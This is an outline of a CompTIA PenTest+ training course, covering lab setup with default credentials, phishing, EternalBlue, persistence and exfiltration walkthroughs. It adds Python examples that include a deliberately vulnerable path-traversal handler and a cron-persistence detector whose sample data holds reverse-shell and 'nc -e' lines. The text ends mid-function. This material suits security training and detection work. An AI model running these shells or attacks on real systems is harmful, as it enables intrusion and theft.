CompTIA PenTest+ Certification
Security Training Architect I in Content
Welcome to the CompTIA PenTest+ certification course!
What is a penetration tester? Maybe you've been exposed to the idea of being an ethical hacker through movies or television, and this profession intrigues you. Or maybe you already work in the security field and you'd like to move into a penetration tester (pentester) role. If either of these is true, you've come to the right place.
Pentesters specialize in identifying and exploiting weaknesses within organizations. Pentesters not only work to discover weaknesses in servers and applications, but also in people. To be a successful pentester, you must know how to use a variety of tools, and you should be able to write scripts in multiple languages, as this allows you to write your own tools and create time-saving scripts.
The CompTIA PenTest+ certification course will walk you through the process of performing a pentest. You'll also become familiar with many popular tools and scripting languages. Whether you're interested in becoming a pentester or simply curious about the profession, this course is for you. Not only will this course prepare you for the certification exam, but it will also arm you with the skills necessary for entering into the mysterious realm of pentesting.
About the Author
In this video, you'll meet Bob Salmans, the security training architect for this course.
About the Course
This video outlines what to expect from this course. We'll discuss how penetration testing works and several of the tools used during the process.
Setting Up Your Pentest Lab
In this video, we will walk through the process of setting up your pentest lab. We've provided you with four images to download to build your own pentest lab. We will be using VirtualBox, a free hypervisor that runs on Linux, macOS, and Windows. The lab will require 60 GB of disk space and 5 GB of memory. The virtual machines can run on an external hard drive; you do not have to use local hard drive space.

1. Download the four virtual machine images:
   Kali Linux: https://s3.amazonaws.com/linuxacademy-lab-files/CompTIA+PenTest%2B+Certification/Kali+Linux/Kali_Linux.ova
   MS2 Linux: https://s3.amazonaws.com/linuxacademy-lab-files/CompTIA+PenTest%2B+Certification/MS2+Linux/MS2_Linux.ova
   MS3 Linux: https://s3.amazonaws.com/linuxacademy-lab-files/CompTIA+PenTest%2B+Certification/MS3+Linux/MS3_Linux.ova
   MS3 Windows: https://s3.amazonaws.com/linuxacademy-lab-files/CompTIA+PenTest%2B+Certification/MS3-Windows/MS3_Windows.ova
   (To re-initialize the Windows demo license, open an administrative command prompt and run "slmgr.vbs -rearm".)
2. Credentials for the virtual machines:
   Kali Linux: root / toor
   MS2 Linux: msfadmin / msfadmin
   MS3 Windows: vagrant / vagrant
   MS3 Linux: vagrant / vagrant
3. Download the latest CherryTree lab file onto your Kali machine: https://github.com/linuxacademy/content-pentest-cherrytree-upload/raw/master/Pentest-Plus-Labs.ctb

Note: All of these VMs' virtual network adapters have been set up to prevent them from accessing the Internet, for your safety (the MS2 and MS3 boxes are deliberately vulnerable and should stay on the isolated lab network). If you would like to enable Internet access on your Kali VM, follow these steps:
1. Turn off your Kali VM.
2. Within VirtualBox, right-click on your Kali VM and select Settings.
3. Click on the Network icon.
4. Select "Adapter 2".
5. Check the box next to "Enable Network Adapter".
6. Next to "Attached to:", select "NAT" from the drop-down.
7. Click OK.
8. Power on your Kali VM; it should now have Internet access.
About the Exam
This video provides an overview of the CompTIA PenTest+ certification exam, including the exam format, pricing, and length, and how to sign up for it.
1.0 Planning and Scoping
1.1 Planning for an Engagement
Pentests and Pentesting Frameworks
In this video, we'll start building the foundational knowledge needed to become a pentester. We'll be covering what exactly a pentest is and what pentesting frameworks are.
The Pentest Process
In this video, we'll continue building the foundational knowledge needed to become a pentester. We'll be covering the pentest process, as outlined by CompTIA.
Communication, Rules of Engagement, and Resources
In this video, we'll continue building the foundational knowledge needed to become a pentester. We'll be covering the importance of communication, rules of engagement, and resources used during a pentest.
Confidentiality, Budgeting, Impact Analysis, Remediation Timelines, Disclaimers, and Constraints
In this video, we'll continue building the foundational knowledge needed to become a pentester. We'll be covering the importance of confidentiality, budgeting, impact analysis, remediation timelines, disclaimers, and constraints.
1.2 Legal Considerations
Key Legal Concepts
In this video, we'll go over key legal concepts in pentesting, including the types of contracts involved in a pentest, export laws, corporate policies, cloud providers, and computer crime laws. NOTE: AWS's rules for pentesting have changed since the recording of this video. They now allow for some pentesting activities and their penetration testing policy can be found here: https://aws.amazon.com/security/penetration-testing/
1.3 Scoping an Engagement
Defining the Scope, Goals and Deliverables, and Assessments and Strategies
In this video, we will discuss what a scope is and what it consists of. We will also talk about project goals and deliverables and go over the different assessment types and strategies.
Threat Actors, Risk Response, and Tolerance
In this video, we'll continue building the foundational knowledge needed to become a pentester. We'll be covering what a threat actor is, risk response, and the idea of tolerance as it relates to a pentest.
Types of Targets and Pentest Considerations
In this video, we'll continue building the foundational knowledge needed to become a pentester. We'll be covering types of targets and what to consider during a pentest.
1.4 Key Aspects of Compliance-Based Assessments
In this video, we'll discuss compliance frameworks, the different types of controls checked during an audit, and why it's important for pentesters to understand compliance.
2.0 Information Gathering and Vulnerability Identification
2.1 Information Gathering Techniques
Active and Passive Reconnaissance
In this video, we cover active and passive reconnaissance of our target. This includes the use of Open Source Intelligence (OSINT) during passive reconnaissance and different types of target scanning during active reconnaissance.
Weaponizing Data and Introduction to Metasploit
In this video, we'll cover the idea of weaponizing data and have an introduction to Metasploit. During the introduction to Metasploit, we'll cover what Metasploit is and how to use it.
Enumeration
In this video, we'll cover enumeration. This includes enumeration of Linux and Windows hosts, services and shares, and websites. We also take a look at some tools that will help in the enumeration process.
Introduction to Meterpreter
In this video, you will be introduced to Meterpreter, available in the Metasploit framework. We will show you the capabilities of some of the tools Meterpreter has and where to learn more about each of the tools.
Scenario Walkthrough 01: How to Use Nmap to Scan a Host
This video will introduce you to the wonderful Nmap tool. Nmap is probably the most widely used tool in the security industry. You will need to be very familiar with Nmap because it's covered in detail on the PenTest+ exam.
Scenario Walkthrough 02: How to Enumerate a Service with Banner Grabbing
In this video, we'll be performing the process of banner grabbing to enumerate services. We'll be using Nmap, Netcat, and Bash to perform banner grabbing in three different ways. We'll compare the three methods to see the differences in enumerated data.
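As an added illustration of the "write your own tool" approach this course encourages (this is example code, not part of the course material): a small Python banner grabber that does what the Netcat and Bash /dev/tcp methods do by hand, with a timeout so a silent port is reported rather than hanging, and an optional probe for services such as HTTP that say nothing until asked. The helper serve_banner_once is a stand-in service so the example runs offline, and the vsFTPd banner it sends is a constructed sample; both names are this example's own.

```python
import socket
import threading


def serve_banner_once(banner: bytes) -> int:
    """Throwaway TCP service on 127.0.0.1 that sends one banner to the first
    client and closes. Stands in for a real daemon so the example runs
    offline. Returns the bound port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def handle():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(banner)
        srv.close()

    threading.Thread(target=handle, daemon=True).start()
    return srv.getsockname()[1]


def grab_banner(host: str, port: int, timeout: float = 3.0,
                probe: bytes = b"", max_bytes: int = 1024) -> str:
    """Connect, optionally send a probe (HTTP says nothing until asked, so
    pass b"HEAD / HTTP/1.0\\r\\n\\r\\n" for it), then read what the service
    volunteers. Returns "" on refusal or timeout so a silent port is
    reported instead of raising, where `nc -v` would just sit there."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            if probe:
                s.sendall(probe)
            chunks = []
            received = 0
            while received < max_bytes:
                try:
                    data = s.recv(max_bytes - received)
                except socket.timeout:
                    break          # service is up but quiet: keep what we have
                if not data:
                    break          # peer closed the connection
                chunks.append(data)
                received += len(data)
            return b"".join(chunks).decode("utf-8", errors="replace").strip()
    except OSError:
        return ""


def free_port() -> int:
    """Pick a currently unused localhost port (used to show a closed port)."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    # constructed sample banner in the shape vsftpd prints on connect
    port = serve_banner_once(b"220 (vsFTPd 2.3.4)\r\n")
    print(f"127.0.0.1:{port} -> {grab_banner('127.0.0.1', port)!r}")
    print(f"closed port -> {grab_banner('127.0.0.1', free_port(), timeout=1.0)!r}")
```

Point the function at a real host and port to compare its output with `nmap -sV`: Nmap sends protocol-specific probes and matches against its signature database, so it will often name a service this passive read cannot.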
Scenario Walkthrough 03: Performing Website Enumeration with Kali Linux
In this video, you'll use Kali Linux to perform website enumeration. NMAP will be the tool of choice for this task. We'll enumerate a couple of websites and take a look at what we are able to find that may help us compromise a host.
Scenario Walkthrough 04: Using OWASP Dirbuster to Find Hidden Directories
In this video, we'll take a look at the OWASP Dirbuster tool. This tool is designed to discover directories and files on a website. It can use dictionary word files in an attempt to guess file and directory names and can identify hidden directories.
Scenario Walkthrough 05: Finding OSINT Data Using theHarvester and the OSRFramework
In this video, we'll gather OSINT data using two tools. The first tool is theHarvester and the second is the OSRFramework. OSRFramework doesn't come pre-installed on Kali Linux like theHarvester does, but it's installed in the Kali Linux image you downloaded from Linux Academy.
2.2 Performing a Vulnerability Scan
In this video, we'll discuss the different types of vulnerability scans and what to consider when planning a scan. We'll also take a look at container security and application security.
Scenario Walkthrough 06: Scanning Websites for Vulnerabilities Using Nikto
In this video, we'll be using Nikto, a web vulnerability scanner, to scan a website for vulnerabilities. We'll also look at using NMAP to scan for open web ports and then pass them on to Nikto to scan for vulnerabilities. Lastly, we'll take a look at what vulnerabilities were identified and how they may help us compromise the host.
Scenario Walkthrough 07: Performing a Vulnerability Scan using OpenVAS
In this video, we'll be using the OpenVAS vulnerability scanner to scan a host and identify vulnerabilities present on that host. We'll be using Greenbone Security Assistant, the web front-end for OpenVAS, to set up and run the scan.
Scenario Walkthrough 08: Using Nmap to Scan for Vulnerabilities
In this video, we'll be taking a look at an additional feature of NMAP which uses built-in scripts to scan for vulnerabilities. We'll also discuss scenarios in which you'd use NMAP for vulnerability scanning.
2.3 Analyzing Vulnerability Scan Results
In this video, we'll discuss the process of analyzing vulnerabilities. We'll go over how to review the results from vulnerability scans to identify false positives and categorize and prioritize our findings.
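An added example (not course material) of the triage described above, in Python: each finding carries a CVSS score, whether the scanner confirmed the flaw or only inferred it from a version banner, and whether a public exploit exists. Version-only matches are flagged for manual verification because a backported patch leaves the banner unchanged, which is the most common source of false positives. The Finding class, the scoring weights and the sample CVSS values are constructed for this example; use your scanner's real scores and your own weighting in practice.

```python
from dataclasses import dataclass


@dataclass
class Finding:
    host: str
    port: int
    title: str
    cvss: float            # base score, 0.0 - 10.0
    detection: str         # "active": scanner exercised the flaw; "version": inferred from a banner
    exploit_public: bool   # a working exploit is available (Metasploit, Exploit-DB)


SEVERITY_BANDS = [          # CVSS v3 qualitative rating scale
    (9.0, "Critical"),
    (7.0, "High"),
    (4.0, "Medium"),
    (0.1, "Low"),
]


def severity(cvss: float) -> str:
    for floor, label in SEVERITY_BANDS:
        if cvss >= floor:
            return label
    return "Informational"


def needs_verification(f: Finding) -> bool:
    """Version-only matches are the usual false positives: a backported fix
    leaves the banner unchanged, so confirm by hand before reporting."""
    return f.detection == "version"


def triage_score(f: Finding) -> float:
    """Simple weighting: CVSS, plus 2 if we can exploit it today, minus 1
    while it is unconfirmed. The weights are this example's, not CompTIA's."""
    score = f.cvss
    if f.exploit_public:
        score += 2.0
    if needs_verification(f):
        score -= 1.0
    return score


def prioritize(findings):
    return sorted(findings, key=triage_score, reverse=True)


def by_severity(findings):
    buckets = {}
    for f in findings:
        buckets.setdefault(severity(f.cvss), []).append(f.title)
    return buckets


# Constructed sample report; the CVSS values are illustrative, not authoritative.
SAMPLE_FINDINGS = [
    Finding("192.168.56.103", 445, "MS17-010 SMB remote code execution", 8.1, "active", True),
    Finding("192.168.56.101", 22, "OpenSSH weak algorithms (banner match)", 5.3, "version", False),
    Finding("192.168.56.101", 21, "vsftpd 2.3.4 backdoor (banner match)", 9.8, "version", True),
    Finding("192.168.56.101", 80, "Server header reveals product/version", 0.0, "active", False),
]


if __name__ == "__main__":
    for f in prioritize(SAMPLE_FINDINGS):
        flag = " [verify]" if needs_verification(f) else ""
        print(f"{triage_score(f):5.1f} {severity(f.cvss):<13} {f.host}:{f.port} {f.title}{flag}")
```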
Scenario Walkthrough 09: Analyzing an OpenVAS Vulnerability Report
In this video, we'll be reviewing the report from the vulnerability scan you ran with OpenVAS in scenario walkthrough number 7. We'll look at the individual vulnerabilities identified, possible solutions to the vulnerabilities, and a couple of features within OpenVAS reports.
2.4 Leveraging Information to Prepare for Exploitation
In this video, we'll be covering the idea of leveraging the information found during reconnaissance. This includes mapping vulnerabilities and prioritizing them. We also take a look at many common attack techniques and common ways to gain access.
Scenario Walkthrough 10: An Introduction to CherryTree
In this video, you'll be introduced to CherryTree, a note-taking application that comes pre-installed on Kali Linux. CherryTree allows for nested formatting, URL links, and the insertion of images. We'll also take a look at creating a screenshot in Kali Linux using GIMP.
2.5 System Weaknesses
Weaknesses of Specialized Systems
In this video, we cover specialized systems and their weaknesses. Specialized systems include mobile devices, SCADA, ICS, RTOS, IoT, and POS. We take a look at why these devices have weaknesses and how they may be our way into a network.
3.0 Attacks and Exploits
3.1 Social Engineering
Components of a Social Engineering Attack
In this video, we will discuss the components of a social engineering attack. We will also walk through a scenario in which we attempt to discover our target organization's ISP.
Social Engineering Attacks and Techniques
In this video, we will review the different motivation techniques that can be used in a social engineering attack. We will also discuss the different types of phishing attacks, including vishing and whaling.
Scenario Walkthrough 11: Creating a Credential Harvesting Website with SET
In this scenario walkthrough, we will be using the Social Engineering Toolkit (SET) to create a credential harvesting website. After creating the website, we can send out phishing emails with links to the website in hopes that a target will follow the link and enter their credentials.
Scenario Walkthrough 12: Using SET to Execute a Spear Phishing Attack
In this scenario walkthrough, we will be using the Social Engineering Toolkit (SET) to craft a spear phishing attack. We will select the exploit, payload, and target email address, and then launch the attack. The OSINT data we gathered earlier will be crucial for the success of this attack.
Scenario Walkthrough 13: Executing a USB Dropper Attack Using SET
In this scenario walkthrough, we will be using the Social Engineering Toolkit (SET) to craft a USB dropper attack. We will create a malicious .exe file that, when launched, will create a reverse TCP Meterpreter shell back to our Kali box. This attack relies on our target's lack of security awareness and their curiosity. When leaving USB devices behind at our target's site, we want to make them enticing by labeling them something like “Vacation Pictures” or “Payroll Data”.
3.2 Network-Based Vulnerabilities
Sniffing, Hijacking, and Man-in-the-Middle Attacks
In this video, we'll go over the technical aspects of sniffing, including DNS poisoning. Then we'll dive into a couple different types of hijacking and discuss man-in-the-middle attacks.
Network Protocol Attacks
In this video, we'll cover several network protocols (SMB, SNMP, SMTP, and FTP) and the different ways to attack them.
Name Resolution, Brute Force, and DoS Attacks
In this video, we'll discuss more common network attacks, including name resolution attacks and brute force attacks. We'll also go over pass-the-hash, denial of service (DoS) attacks, and VLAN hopping.
Scenario Walkthrough 14: DNS Poisoning Using the Hosts File
In this scenario walkthrough, we'll use a form of DNS poisoning to redirect our targets to a credential harvesting website we set up using the Social Engineering Toolkit (SET). This isn't necessarily an exact replica of an attack you might carry out, but it demonstrates the effects of DNS poisoning.
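An added detection-side example, not part of the course material: the hosts file is consulted before DNS, so the check that catches this attack is to parse it and report any watched domain it pins to an address. SAMPLE_HOSTS is a constructed file in which the 192.168.56.101 entry stands for the SET harvesting host in the lab; the function names are this example's own.

```python
import ipaddress

# Constructed sample of a tampered /etc/hosts (not taken from the lab image).
SAMPLE_HOSTS = """\
127.0.0.1       localhost
::1             localhost ip6-localhost
192.168.56.101  login.example.com www.example.com   # added by attacker
127.0.0.1       update.example.com                  # blackholed
10.0.0.5        intranet.corp.local
"""


def parse_hosts(text: str):
    """Return (line_number, ip_address, [hostnames]) for every usable entry.
    Comments and blank lines are dropped; a line whose first field is not
    an IP address is skipped, as the resolver would skip it."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        entries.append((lineno, ip, [name.lower() for name in fields[1:]]))
    return entries


def find_overrides(text: str, watched_domains):
    """Report every watched domain (or subdomain) the hosts file pins to an
    address. Any pin is a finding: the resolver reads this file before asking
    DNS, so the entry wins regardless of what the zone says. A loopback pin
    is how an attacker blackholes update or telemetry hosts, so it is kept
    in the report and tagged separately."""
    watched = {d.lower().lstrip(".") for d in watched_domains}
    hits = []
    for lineno, ip, names in parse_hosts(text):
        for name in names:
            if name in watched or any(name.endswith("." + d) for d in watched):
                kind = "blackhole" if ip.is_loopback else "redirect"
                hits.append((name, str(ip), kind, lineno))
    return hits


if __name__ == "__main__":
    for hit in find_overrides(SAMPLE_HOSTS, ["example.com"]):
        print(hit)
```

On a real host, read /etc/hosts (or C:\Windows\System32\drivers\etc\hosts) and pass your organisation's domains; the same logic is worth running from an endpoint agent, since the attacker in this walkthrough needs write access to that file and the modification time will have changed.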
Scenario Walkthrough 15: Using Wireshark to Sniff Plaintext Passwords
In this scenario walkthrough, we will take a look at the dangers of communicating in plain text versus using encrypted communications. We'll use Wireshark to sniff an FTP session and identify the credentials used to authenticate to the FTP server.
3.3 Wireless and RF-Based Vulnerabilities
Wireless Attacks and Exploits
In this video, we'll discuss several different types of wireless attacks, including evil twin attacks, de-authentication, fragmentation, bluesnarfing, and bluejacking.
Performing an Evil Twin Attack with SSLsplit
In this video, I'll show you how to set up an evil twin attack by running the SSLsplit module on a Wi-Fi Pineapple to intercept user credentials. The goal of this attack is to mimic a target's wireless network so the user's devices will connect to our access point instead of the real one. When the target attempts to connect to SSL websites, they'll receive our access point's SSL certificate, allowing us to intercept their credentials. Keep in mind that the browser will warn that our certificate isn't trusted unless the device already trusts a CA we control, and for sites the browser already knows as HSTS hosts it won't offer a click-through at all, so the attack relies on the user ignoring that warning.
3.4 Application-Based Vulnerabilities
Directory Traversal and Poison Null Bytes
In this video, we'll discuss some common web application vulnerabilities. We'll also go over a few of the attacks used to exploit these vulnerabilities, including directory traversal and poison null bytes.
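An added example (not from the course) showing the two handlers side by side in Python: a file-download routine that trusts the requested name, and a hardened version that rejects embedded null bytes and checks the resolved path against the document root. The function names and the demo directory tree are constructed for the example. Python's own open() already refuses embedded NULs, so the explicit null-byte check matters mainly for C-backed code such as older PHP, where the string was silently truncated at the NUL and "x.php%00.jpg" passed an extension filter yet opened x.php.

```python
import os
import tempfile


def read_file_vulnerable(base_dir: str, requested: str) -> bytes:
    """Naive download handler: joins the caller-supplied name onto the
    document root and opens it. '../' walks out of base_dir, and an
    absolute name replaces base_dir entirely (os.path.join semantics)."""
    path = os.path.join(base_dir, requested)
    with open(path, "rb") as f:
        return f.read()


def read_file_hardened(base_dir: str, requested: str) -> bytes:
    """Same handler with the two checks that close the hole: refuse embedded
    NULs, then resolve symlinks and '..' with realpath and confirm the
    result still lives under the document root before opening it."""
    if "\x00" in requested:
        raise ValueError("embedded null byte in requested path")
    root = os.path.realpath(base_dir)
    path = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, path]) != root:
        raise PermissionError(f"path escapes document root: {requested!r}")
    with open(path, "rb") as f:
        return f.read()


def build_demo_tree():
    """Constructed layout: <tmp>/www is the document root with one public
    page; <tmp>/secret.txt sits one level above it, where a traversal lands."""
    tmp = tempfile.mkdtemp()
    web = os.path.join(tmp, "www")
    os.mkdir(web)
    with open(os.path.join(web, "index.html"), "w") as f:
        f.write("<h1>public</h1>")
    with open(os.path.join(tmp, "secret.txt"), "w") as f:
        f.write("db_password=hunter2")
    return tmp, web


if __name__ == "__main__":
    _, web = build_demo_tree()
    print(read_file_vulnerable(web, "../secret.txt"))        # leaks the secret
    for bad in ("../secret.txt", "/etc/passwd", "index.html\x00.jpg"):
        try:
            read_file_hardened(web, bad)
        except (PermissionError, ValueError) as e:
            print(f"blocked {bad!r}: {e}")
```

The check is done on the resolved path rather than by stripping "../" from the input, because encoded variants (%2e%2e/, ..\, overlong UTF-8) are endless while the filesystem's view of the final path is unambiguous.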
Authentication, Authorization, and Injection Attacks
In this video, we'll go over some of the different types of authentication, authorization, and injection attacks, including brute-forcing, cross-site scripting (XSS), and SQL injection.
File Inclusion Vulnerabilities and Web Shells
In this video, we'll go over local and remote file inclusion vulnerabilities and learn what web shells are and how we can use them. We will also discuss race conditions and how insecure code can lead to vulnerable applications.
Scenario Walkthrough 16: Using Hydra to Brute-Force FTP
In this scenario walkthrough, we will use Hydra to perform a brute force attack against an FTP server. Hydra can be used for brute force attacks against many protocols, not just FTP.
Scenario Walkthrough 17: Finding Web Application Vulnerabilities with OWASP ZAP
In this scenario walkthrough, we'll use OWASP ZAP to find vulnerabilities in a web application. OWASP ZAP is a very popular tool, and it's really easy to use. You can perform either automated or manual testing with OWASP ZAP, and it's user-friendly for all skill levels.
3.5 Local Host Vulnerabilities
OS Vulnerabilities and Password Cracking
In this video, we'll take a look at several different types of operating system vulnerabilities in Windows and Linux. We'll also take a look at password cracking techniques for Windows and Linux.
Password Cracking Tools, Default Accounts, and Privilege Escalation
In this video, we'll review the tools that can be used for different types of password attacks. We'll also cover default accounts on both Windows and Linux, as well as how to perform privilege escalation on both operating systems.
System Files, Sandbox Escapes, and Hardware Attacks
In this video, we'll go over the Windows and Linux system files you need to be familiar with for the PenTest+ certification exam. We'll also take a look at sandbox escapes and hardware-level attacks.
Scenario Walkthrough 18: Obtaining Password Hashes with Armitage
In this scenario walkthrough, we will use Armitage to brute-force VNC on our MS2 Linux box. Once we successfully brute-force VNC, we'll create a user account on the box. Then we'll log in to the MS2 Linux box with our new credentials and grab some password hashes that we'll crack using John the Ripper.
Scenario Walkthrough 19: Cracking Password Hashes with John the Ripper
In this scenario walkthrough, we will use SCP to exfiltrate the hashes that we gained access to in the previous section. Once the password hashes have been exfiltrated from our MS2 Linux box, we will use John the Ripper to crack the root password hash.
Scenario Walkthrough 20: Performing Local Privilege Escalation with Meterpreter
In this scenario walkthrough, we will perform local privilege escalation using Meterpreter. Meterpreter has a built-in privilege escalation script that can make this process as simple as running a single command. The getsystem command runs through several different techniques in an attempt to gain system-level privileges.
Scenario Walkthrough 21: Exploiting the EternalBlue Vulnerability
In this scenario walkthrough, we will use the Metasploit framework to exploit MS17-010 (the SMB EternalBlue vulnerability) on our MS3 Windows box. We will use the Metasploit framework to set our exploit, payload, and options, then exploit the vulnerability and hopefully get a Meterpreter shell.
3.6 Physical Security Vulnerabilities
Physical Security Goals and Guidelines
In this video, we'll discuss physical security testing. We'll take a look at the different test types and the overall goal of physical security penetration tests.
3.7 Post-Exploitation Techniques
Lateral Movement, Pivoting, and Persistence
In this video, we'll talk about lateral movement, pivoting, and persistence. We'll go over what all of these terms mean and how to achieve each of them.
Shells, Netcat, and Scheduled Tasks
In this video, we'll cover two different kinds of shells and how to set them up using Netcat. We'll also take a look at how to set up scheduled tasks in Windows and cron jobs in Linux, both of which can be used to establish persistence.
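An added example from the defender's side of this material (not course code): the cron-based persistence described above leaves a crontab entry behind, and a short scanner over those entries catches the usual shapes, a bash /dev/tcp reverse shell, a Netcat invocation with -e, a base64 blob decoded and piped into a shell, or a downloader. SAMPLE_CRONTAB is a constructed file with two benign jobs and three that match; the indicator list and function names are this example's own, and the Windows equivalent is to enumerate scheduled task actions with schtasks /query /v or Get-ScheduledTask and apply the same patterns.

```python
import re

# Constructed sample crontab (not from the lab image).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'
@reboot nc 192.168.56.1 4444 -e /bin/sh
30 2 * * 0 /usr/local/bin/backup.sh
* * * * * echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0Jw== | base64 -d | sh
"""

INDICATORS = [
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp reverse shell"),
    (re.compile(r"\b(nc|ncat|netcat)\b"), "netcat invocation"),
    (re.compile(r"-e\s+/bin/(ba)?sh\b"), "shell handed to a network tool (-e)"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"\|\s*(ba)?sh\b"), "piped into a shell"),
    (re.compile(r"\b(curl|wget)\b"), "downloader in a scheduled job"),
]


def parse_cron_line(line: str):
    """Return (schedule, command), or None for comments, blanks and VAR=value
    lines. Accepts the five-field form and the @reboot/@hourly shortcuts."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):
        parts = line.split(None, 1)
        return (parts[0], parts[1] if len(parts) > 1 else "")
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None            # VAR=value or malformed
    return (" ".join(parts[:5]), parts[5])


def suspicious_cron_entries(text: str):
    """(line number, schedule, command, [reasons]) for every entry matching an
    indicator. @reboot on its own is not flagged; it is added as a reason only
    on an entry that already looks bad, since boot-time is the persistence
    schedule an attacker wants."""
    hits = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        parsed = parse_cron_line(raw)
        if parsed is None:
            continue
        schedule, command = parsed
        reasons = [label for pattern, label in INDICATORS if pattern.search(command)]
        if reasons:
            if schedule == "@reboot":
                reasons.append("runs at every boot")
            hits.append((lineno, schedule, command, reasons))
    return hits


if __name__ == "__main__":
    for lineno, schedule, command, reasons in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"line {lineno} [{schedule}] {command}\n    {', '.join(reasons)}")
```

Run it over `crontab -l` for every user plus /etc/crontab and /etc/cron.d/*; pattern matching like this is a first pass, so treat an empty result as "nothing obvious" rather than "clean".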
Services/Daemons, Anti-Forensics, and Covering Your Tracks
In this video, we'll take a look at Windows services and Linux daemons and how we can use them during a pentest. We'll also review some anti-forensics techniques and how to cover your tracks.
Scenario Walkthrough 22: Clearing System Logs with Meterpreter
In this scenario walkthrough, we will use Meterpreter to clear the system logs on our MS3 Windows machine. Meterpreter includes a built-in command for clearing the event logs. All it takes to run it is a single command: clearev. It's that easy! Keep in mind that clearing the logs is itself logged: Windows writes event ID 1102 to the Security log and event ID 104 to the System log when those logs are cleared, and a SIEM that forwards events in real time will already have the originals, so on a monitored network this action draws attention rather than removing it.
Scenario Walkthrough 23: Setting Up Persistence with Netcat
In this scenario walkthrough, we will set up persistence using Netcat. Once we have a Meterpreter session to our target, we'll upload the netcat executable. Then we'll set registry values to launch a Netcat connection to a listener on our Kali box in order to create a reverse shell to our target.
Scenario Walkthrough 24: Exfiltrating Data with Netcat
In this scenario walkthrough, we will exfiltrate data from our compromised target to our Kali box. We will use two separate Netcat sessions to do this. The first session will be our management session. The second will be used to transfer a file from our target to our Kali box.
Scenario Walkthrough 25: Setting Up Persistence with Meterpreter
In this scenario walkthrough, we will set up persistence with a Meterpreter shell. We will use a tool called msfvenom to create a custom .exe payload file which we will then transfer to our target using the built-in Meterpreter script persistence_exe.
Scenario Walkthrough 26: Exfiltrating Data with Meterpreter
In this scenario walkthrough, we will exfiltrate data with Meterpreter. If you have a Meterpreter shell, this is the easiest way to exfiltrate data from your target.
4.0 Penetration Testing Tools
4.1 Using Nmap for Information Gathering
Nmap Deep Dive
In this video, we'll discuss how to use Nmap to gather information. From executing standard port scans to running scripts, Nmap is a powerful pentesting tool, and you'll be tested on it in the PenTest+ certification exam.
4.2 Choosing Pentesting Tools
Pentesting Tools and Use Cases
In this video, we will review a variety of pentesting tools, many of which we've already discussed and used in labs. We'll talk about some of the most common pentesting use cases and go over which tools are best suited to each.
4.3 Analyzing Tool Output and Data
Understanding Tool Outputs
In this video, we'll discuss several different types of attacks and the tools used to perform them. We will walk through how these tools are used and learn how to read each tool's output.
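An added example of reading one of those outputs programmatically (example code, not from the course): Nmap's XML output (-oX) is what you should save for anything larger than a single host, because it carries the per-service detection method and confidence that the normal text output hides. The parser below flattens it to one record per host and port and pulls out NSE script results. SAMPLE_NMAP_XML is a constructed sample in the layout nmap writes, with values that mimic the lab's MS2 box but were typed by hand for this example; the function names are this example's own.

```python
import xml.etree.ElementTree as ET

# Constructed sample in the layout nmap -oX writes (not captured from the lab).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -sC -oX - 192.168.56.101-102" version="7.80">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.56.101" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open" reason="syn-ack"/>
        <service name="ftp" product="vsftpd" version="2.3.4" method="probed" conf="10"/>
        <script id="ftp-anon" output="Anonymous FTP login allowed (FTP code 230)"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="filtered" reason="no-response"/>
        <service name="http" method="table" conf="3"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.168.56.102" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text: str):
    """Flatten nmap XML into one dict per (host, port). Hosts that are not
    'up' are dropped. 'method' says how much to trust the service name:
    'probed' means -sV matched a version probe, 'table' means nmap only
    looked the port number up in nmap-services (conf is 3 at best)."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        ip = addr.get("addr") if addr is not None else "?"
        for port in host.findall("ports/port"):
            svc = port.find("service")
            product = ""
            if svc is not None:
                product = " ".join(p for p in (svc.get("product"), svc.get("version")) if p)
            rows.append({
                "ip": ip,
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "state": port.find("state").get("state"),
                "service": svc.get("name", "") if svc is not None else "",
                "product": product,
                "method": svc.get("method", "") if svc is not None else "",
                "confidence": int(svc.get("conf", "0")) if svc is not None else 0,
                "scripts": {s.get("id"): s.get("output", "") for s in port.findall("script")},
            })
    return rows


def open_ports(rows, min_confidence: int = 0):
    """Only 'open' ports; 'filtered' means a firewall swallowed the probe,
    which is worth noting but is not a service to attack."""
    return [r for r in rows if r["state"] == "open" and r["confidence"] >= min_confidence]


def script_findings(rows):
    """(ip, port, script id, output) for every NSE script that produced output,
    which is where ftp-anon, smb-vuln-* and friends report their results."""
    return [(r["ip"], r["port"], sid, out)
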